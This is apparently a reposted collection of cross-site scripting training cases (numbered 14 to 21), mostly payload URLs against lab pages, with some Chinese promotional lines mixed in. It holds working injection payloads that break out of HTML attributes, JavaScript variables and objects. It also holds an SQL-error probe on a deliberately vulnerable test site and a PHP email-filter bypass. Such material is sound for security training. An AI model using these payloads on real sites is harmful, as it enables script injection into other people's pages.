Case 14 - Double Injection in HTML Context with Double Quotes

https://brutelogic.com.br/multi/double-html.php?p="</a><svg onload=alert(1)>

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

Multi Reflection (Pro Only) Safe 第1张

 

Case 15 - Double Injection in Mixed Context (HTML + JS) with Default Quotes

 

https://brutelogic.com.br/multi/double-mixed.php?p="</a><svg onload=alert(1)>

Multi Reflection (Pro Only) Safe 第2张

 

Case 16 - Quoteless Inline Double Injection in JS variables

 https://brutelogic.com.br/multi/js-inline.php?p=;alert(1)//\

 

Multi Reflection (Pro Only) Safe 第3张

 


Case 17 - Quoteless Inline Double Injection in JS object

https://brutelogic.com.br/multi/js-object.php?p=};alert(1)//\

Multi Reflection (Pro Only) Safe 第4张


Case 18 - Quoteless Inline Double Injection in JS object with Nested Array

 

https://brutelogic.com.br/multi/js-object2.php?p=}]};alert(1)//\

 

Multi Reflection (Pro Only) Safe 第5张

 

Case 19 - Quoteless Inline Double Injection in JS object with Nested Function

https://brutelogic.com.br/multi/js-object3.php?p=}}};alert(1)//\

 

Multi Reflection (Pro Only) Safe 第6张

 

Special Cases (Pro Only)

 

Case 20 - SQLi error-based HTML Injection

 

http://testphp.vulnweb.com/listproducts.php?cat=1"

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '€œ' at line 1 Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74 

http://testphp.vulnweb.com/listproducts.php?cat=1"<svg onload=alert(1)>

Multi Reflection (Pro Only) Safe 第7张

 

Case 21 - PHP FILTER_VALIDATE_EMAIL Bypass HTML Injection

https://brutelogic.com.br/tests/email.php?email="<script>alert(1);</script>"@brutelogic.com.br

 

Multi Reflection (Pro Only) Safe 第8张

 

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄